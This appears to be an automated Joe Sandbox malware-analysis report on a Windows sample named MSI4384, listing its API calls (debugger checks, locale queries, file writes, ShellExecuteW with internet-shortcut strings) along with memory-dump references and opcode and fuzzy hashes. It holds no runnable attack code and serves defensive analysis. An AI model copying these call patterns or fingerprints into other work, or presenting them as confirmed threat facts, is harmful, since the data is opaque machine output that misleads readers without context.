                                                                    • IsDebuggerPresent.KERNEL32 ref: 0044A2C9
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0044A2E2
                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0044A2EC
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                    • String ID:
                                                                    • API String ID: 254469556-0
                                                                    • Opcode ID: 1c045af38ad3aee086299a2fa4d154511dad2c175f899f80942aa4f25bca0a7b
                                                                    • Instruction ID: efed4c09eca0b3b91fe097b5807bdac30e4b97d791a2c1785279c83232ff4b1b
                                                                    • Opcode Fuzzy Hash: 1c045af38ad3aee086299a2fa4d154511dad2c175f899f80942aa4f25bca0a7b
                                                                    • Instruction Fuzzy Hash: D131F975D452189BEB21DFA5D9497CDBBB8BF08304F1041EAE80CAB250EB759A848F49
                                                                    APIs
                                                                    • GetLocaleInfoEx.KERNEL32(!x-sys-default-locale,20000001,00000000,00000002,?,?,004232C0,?), ref: 004326D5
                                                                    • FormatMessageA.KERNEL32(00001300,00000000,F3E52339,00000000,00000000,00000000,00000000,?,?,?,004232C0,?), ref: 004326FC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    Similarity
                                                                    • API ID: FormatInfoLocaleMessage
                                                                    • String ID: !x-sys-default-locale
                                                                    • API String ID: 4235545615-2729719199
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    APIs
                                                                    • GetLocaleInfoW.KERNEL32(00000000,00001002,?,00000078), ref: 00464BA7
                                                                    • GetLocaleInfoW.KERNEL32(00000000,00001001,?,00000078), ref: 00464BEB
                                                                    • GetLocaleInfoW.KERNEL32(00000000,00001001,?,00000078), ref: 00464CB5
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InfoLocale
                                                                    • String ID:
                                                                    • API String ID: 2299586839-0
                                                                    APIs
                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0044E333
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0044E33D
                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0044E34A
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                    • String ID:
                                                                    • API String ID: 3906539128-0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 2G$(2G$t>G
                                                                    • API String ID: 0-3425963251
                                                                    APIs
                                                                    • LoadResource.KERNEL32(00000000,00000000,F3E52339,00000001,00000000,?,00000000,0046B0C0,000000FF,?,00421D2C,?,?,?,00000000,?), ref: 00421DAB
                                                                    • LockResource.KERNEL32(00000000,?,00421D2C,?,?,?,00000000,?,-00000010,0046B0A0,000000FF,?,00422048,?,00000000,0046B0ED), ref: 00421DB6
                                                                    • SizeofResource.KERNEL32(00000000,00000000,?,00421D2C,?,?,?,00000000,?,-00000010,0046B0A0,000000FF,?,00422048,?,00000000), ref: 00421DC4
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Resource$LoadLockSizeof
                                                                    • String ID:
                                                                    • API String ID: 2853612939-0
                                                                    APIs
                                                                      • Part of subcall function 004495A8: AcquireSRWLockExclusive.KERNEL32(00483B74,?,?,?,00422646,00484714,F3E52339,?,?,0046B16D,000000FF,?,00421A07), ref: 004495B3
                                                                      • Part of subcall function 004495A8: ReleaseSRWLockExclusive.KERNEL32(00483B74,?,?,00422646,00484714,F3E52339,?,?,0046B16D,000000FF,?,00421A07,?,?,?,F3E52339), ref: 004495ED
                                                                    • GetProcessHeap.KERNEL32 ref: 004225F5
                                                                      • Part of subcall function 00449557: AcquireSRWLockExclusive.KERNEL32(00483B74,?,?,004226B7,00484714,0046EC90), ref: 00449561
                                                                      • Part of subcall function 00449557: ReleaseSRWLockExclusive.KERNEL32(00483B74,?,?,004226B7,00484714,0046EC90), ref: 00449594
                                                                      • Part of subcall function 00449557: WakeAllConditionVariable.KERNEL32(00483B70,?,?,004226B7,00484714,0046EC90), ref: 0044959F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ExclusiveLock$AcquireRelease$ConditionHeapProcessVariableWake
                                                                    • String ID: 4GH
                                                                    • API String ID: 1755742941-454853694
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: =E$5
                                                                    • API String ID: 0-1608099182
                                                                    APIs
                                                                    • GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0045FBE9,00000000,00000000,00000000), ref: 0045FAA9
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InformationTimeZone
                                                                    • String ID:
                                                                    • API String ID: 565725191-0
                                                                    APIs
                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,00000008,?,?,?,0046013E,?,?,00000008,?,?,0046A7DE,00000000), ref: 00460398
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ExceptionRaise
                                                                    • String ID:
                                                                    • API String ID: 3997070919-0
                                                                    APIs
                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00449D02
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    Similarity
                                                                    • API ID: FeaturePresentProcessor
                                                                    • String ID:
                                                                    • API String ID: 2325560087-0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0
                                                                    • API String ID: 0-4108050209
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0
                                                                    • API String ID: 0-4108050209
                                                                    • Opcode ID: 2a8ff23ce24f8046767adeb51c467b085ae2074034c0537849e1262018e4a8bb
                                                                    • Instruction ID: 0f3837e6628e7efda9e20e692e76a8cb8a212857e723b67922da1749ffd9dd65
                                                                    • Opcode Fuzzy Hash: 2a8ff23ce24f8046767adeb51c467b085ae2074034c0537849e1262018e4a8bb
                                                                    • Instruction Fuzzy Hash: A8E1CC74A006068FCB25CF69C590BABBBB1AB09306F14461FDC5297763D73CAC4ACB59
                                                                    APIs
                                                                    • GetLocaleInfoW.KERNEL32(00000000,00001001,?,00000078), ref: 00464E00
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale
                                                                    • String ID:
                                                                    • API String ID: 2299586839-0
                                                                    • Opcode ID: 71d201153cf92b5d80883ee3da9a8e1d3dc1151d3d68e332aca84a5e5d520e3c
                                                                    • Instruction ID: ae045421f66625fd3b37e1e4838ea151670fe58a260f7ad30d00b8576444f513
                                                                    • Opcode Fuzzy Hash: 71d201153cf92b5d80883ee3da9a8e1d3dc1151d3d68e332aca84a5e5d520e3c
                                                                    • Instruction Fuzzy Hash: 74217F31A11206ABEF28AA25DD41B7B73A8EF85319F10007BED01D6141F77AAD44C69A
                                                                    APIs
                                                                    • EnumSystemLocalesW.KERNEL32(00464B50,00000001), ref: 00464A90
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: EnumLocalesSystem
                                                                    • String ID:
                                                                    • API String ID: 2099609381-0
                                                                    • Opcode ID: a59a71e66666f57d27b09e199c19fa17b7d7b501db9eef9ed5b549d8aabda89b
                                                                    • Instruction ID: e398204a1bffda33c6b0f890ccd29849c1da80c1c3edfe3b3eeba93ccde4fddd
                                                                    • Opcode Fuzzy Hash: a59a71e66666f57d27b09e199c19fa17b7d7b501db9eef9ed5b549d8aabda89b
                                                                    • Instruction Fuzzy Hash: 2411253A6007019FDF18AF79C8916BAB792FFC0368B15452EE98687B40E375B842C744
                                                                    APIs
                                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00464D6D,00000000,00000000,?), ref: 00465007
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale
                                                                    • String ID:
                                                                    • API String ID: 2299586839-0
                                                                    • Opcode ID: 917e1a149b80b36a6ac6acc9ef16a08aa92ebbbbcf9ef67730afaa5cc806ef02
                                                                    • Instruction ID: 4e417a61c9bafded9479b447349d6549196c62d6f0ada66a01e535af3eeea587
                                                                    • Opcode Fuzzy Hash: 917e1a149b80b36a6ac6acc9ef16a08aa92ebbbbcf9ef67730afaa5cc806ef02
                                                                    • Instruction Fuzzy Hash: F301F936710612FBDB285A25CC05BBB3769EB40754F15443AEC02A3281FA7CFD41C6D6
                                                                    APIs
                                                                    • EnumSystemLocalesW.KERNEL32(00464DB0,00000001), ref: 00464B03
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: EnumLocalesSystem
                                                                    • String ID:
                                                                    • API String ID: 2099609381-0
                                                                    • Opcode ID: 21e181757518e253d036f3f4eb825293fa341d98335b16a56e4b254024b4f36b
                                                                    • Instruction ID: 263fc79ae1a6490a7fd468f627805f61e84e72980e5c71f89e1735a8d042c465
                                                                    • Opcode Fuzzy Hash: 21e181757518e253d036f3f4eb825293fa341d98335b16a56e4b254024b4f36b
                                                                    • Instruction Fuzzy Hash: 19F0C2363003046FDF245F75D881A6B7B95EFC1768B15442EF9458B680E6B5AC418698
                                                                    APIs
                                                                    • GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002,?,?,00446A10,00000000,0047A8D9,00000004,00445628,0047A8D9,00000004,00445A57,00000000,00000000), ref: 00448FB9
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale
                                                                    • String ID:
                                                                    • API String ID: 2299586839-0
                                                                    • Opcode ID: 1aff8709dd50e347ab2dcf90a360b3293fc03711b192c8585241af364ebcb494
                                                                    • Instruction ID: fb2252ea0ef1ae45888c8b799d0a1765396b4687d7d7a952ee86332780af2405
                                                                    • Opcode Fuzzy Hash: 1aff8709dd50e347ab2dcf90a360b3293fc03711b192c8585241af364ebcb494
                                                                    • Instruction Fuzzy Hash: 33E09B32760200E6F7258B799D1EF7F76DDD701746F00455BE603E52C1DEA8CE049255
                                                                    APIs
                                                                    • EnumSystemLocalesW.KERNEL32(00464930,00000001), ref: 00464A0A
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: EnumLocalesSystem
                                                                    • String ID:
                                                                    • API String ID: 2099609381-0
                                                                    • Opcode ID: b4700be1b4a25c64ba35818f5096cdc99540a416a60dfa6fb94ebdba90275087
                                                                    • Instruction ID: 441beaa02857093e0f88f74d9263363c78869addeed308bc4035ab0f794507d0
                                                                    • Opcode Fuzzy Hash: b4700be1b4a25c64ba35818f5096cdc99540a416a60dfa6fb94ebdba90275087
                                                                    • Instruction Fuzzy Hash: F5F0553A3402049BCF14AF35E8466ABBF90EFC2710B46406AEE09CB251E2799847C798
                                                                    APIs
                                                                    • EnumSystemLocalesW.KERNEL32(00464930,00000001), ref: 00464A0A
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: EnumLocalesSystem
                                                                    • String ID:
                                                                    • API String ID: 2099609381-0
                                                                    • Opcode ID: e377a30baaddb5f37a0491e59171569e524e7683eda7b937440af5b1ffe62f32
                                                                    • Instruction ID: a93497f2e18baa747161d8a301a655c3174e94bf7390d4b5b20b4c01ff00407e
                                                                    • Opcode Fuzzy Hash: e377a30baaddb5f37a0491e59171569e524e7683eda7b937440af5b1ffe62f32
                                                                    • Instruction Fuzzy Hash: 68F0553A34020497CF14AF35E80566BBF90EFC2710B46406AEE09CB251E2799847C798
                                                                    APIs
                                                                      • Part of subcall function 004594A1: EnterCriticalSection.KERNEL32(?,?,00462907,00000000,004803B8,0000000C,0046289B,?,?,0045ED86,?,?,0045D0E3,00000001,00000364,00000000), ref: 004594B0
                                                                    • EnumSystemLocalesW.KERNEL32(Function_0003EDC0,00000001,004802B8,0000000C,0045F277,?), ref: 0045EE14
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                    • String ID:
                                                                    • API String ID: 1272433827-0
                                                                    • Opcode ID: c682aa7db7493b9e33ef646ac137b9ee9e20b12750eb32c93f5787c351a837e5
                                                                    • Instruction ID: 45e47926b2d75771e42adecdfef62ee81197ad3ed10335b134aad41d5f12bbce
                                                                    • Opcode Fuzzy Hash: c682aa7db7493b9e33ef646ac137b9ee9e20b12750eb32c93f5787c351a837e5
                                                                    • Instruction Fuzzy Hash: 60F09036A50701DFE700DF99D446B9D77B0EB4972AF10852BE9119B2D1C7B94A04CF44
                                                                    APIs
                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,0045C6FA,?,20001004,00000000,00000002,?,?,0045BCF8), ref: 0045F344
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale
                                                                    • String ID:
                                                                    • API String ID: 2299586839-0
                                                                    • Opcode ID: 5d5841d5ae089be0458325db33b1100aeb006916627717fad26333934595d02d
                                                                    • Instruction ID: 09850a62e4c59d6c062a8b4e7035586d728c2294282eebfd047f234bb889da38
                                                                    • Opcode Fuzzy Hash: 5d5841d5ae089be0458325db33b1100aeb006916627717fad26333934595d02d
                                                                    • Instruction Fuzzy Hash: 71E0D832000118B7CF022F61DC08ADE3E16EF04762F004031FC0151122DB758D299ADE
                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0002A3A0,00449B25), ref: 0044A38A
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: ecfb5bed9d022a144f99d675e5c68abc80d4e96c41a53820b95d76ec0bdb892a
                                                                    • Instruction ID: 3cb8b122aec8348a8a91008d03012fc6e4ca8c9ef0ee5e731528697700c23641
                                                                    • Opcode Fuzzy Hash: ecfb5bed9d022a144f99d675e5c68abc80d4e96c41a53820b95d76ec0bdb892a
                                                                    • Instruction Fuzzy Hash:
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: AllocHeap
                                                                    • String ID:
                                                                    • API String ID: 4292702814-0
                                                                    • Opcode ID: 11fe4f66e403a4e7242daaaaa58a954bb6b35cb6a954825ec3dcf2436c072e97
                                                                    • Instruction ID: 391dbbbe485b32d2d56505d5660239cef9f4b0fa71fe327a7f3f06d65def5326
                                                                    • Opcode Fuzzy Hash: 11fe4f66e403a4e7242daaaaa58a954bb6b35cb6a954825ec3dcf2436c072e97
                                                                    • Instruction Fuzzy Hash: EE425B74D0020A9FCF18CF98C981ABEBBB5FF45305F14416EDD45A7306EA35AA4ACB84
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 47398b504f268ddfd47b1332cbc19df07ffa87418bf3a7d3219e7420ec3f8f4e
                                                                    • Instruction ID: d0d756c3f9687bc86b6d25c36353e39acd71102fe907439426c3b01378d1e65b
                                                                    • Opcode Fuzzy Hash: 47398b504f268ddfd47b1332cbc19df07ffa87418bf3a7d3219e7420ec3f8f4e
                                                                    • Instruction Fuzzy Hash: 1E91C232C01A088ADB12CF68D8413AFB775AF46320F158397DC557B292F73989C9C75A
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ce90631ccd48a786f0dbaec49c2f70008bc2b08315126eb600449cdff332ad58
                                                                    • Instruction ID: 78b2f13ed4ee14b7dd1a9ee4954333d132515523544b4ba46ef45f6a6497a889
                                                                    • Opcode Fuzzy Hash: ce90631ccd48a786f0dbaec49c2f70008bc2b08315126eb600449cdff332ad58
                                                                    • Instruction Fuzzy Hash: C451A571E00109EFDF05CF99C8516AEBBB2EF88345F14C09AE815AB342D734AE55DB94
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00428A4D
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00428AA0
• LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,00000000,0046BFF5,000000FF), ref: 00428AAF
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00428ACB
• WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,0046BFF5,000000FF), ref: 00428BAB
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000,0046BFF5,000000FF), ref: 00428BB7
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,00000000,0046BFF5,000000FF), ref: 00428BF3
• LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,00000000,0046BFF5,000000FF), ref: 00428C11
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,00000000,0046BFF5,000000FF), ref: 00428C2E
• LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,0046BFF5,000000FF), ref: 00428CC3
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 00428D08
• ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000005), ref: 00428D5A
• LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000,0046BFF5,000000FF), ref: 00428D8D
Strings
Similarity
• API ID: ByteCharLocalMultiWide$AllocExecuteFileFreeShell$CloseCreateHandleWrite
• String ID: -_.~!*'();:@&=+$,/?#[]$URL Shortcut content:$[InternetShortcut]URL=$open
• API String ID: 2199533872-3004881174
APIs
• __EH_prolog3.LIBCMT ref: 0043EB0E
• numpunct.LIBCPMT ref: 0043EEF3
  • Part of subcall function 0043B266: __EH_prolog3.LIBCMT ref: 0043B26D
  • Part of subcall function 0043B06C: __EH_prolog3.LIBCMT ref: 0043B073
  • Part of subcall function 0043B06C: std::_Lockit::_Lockit.LIBCPMT ref: 0043B07D
  • Part of subcall function 0043B06C: std::_Lockit::~_Lockit.LIBCPMT ref: 0043B0EE
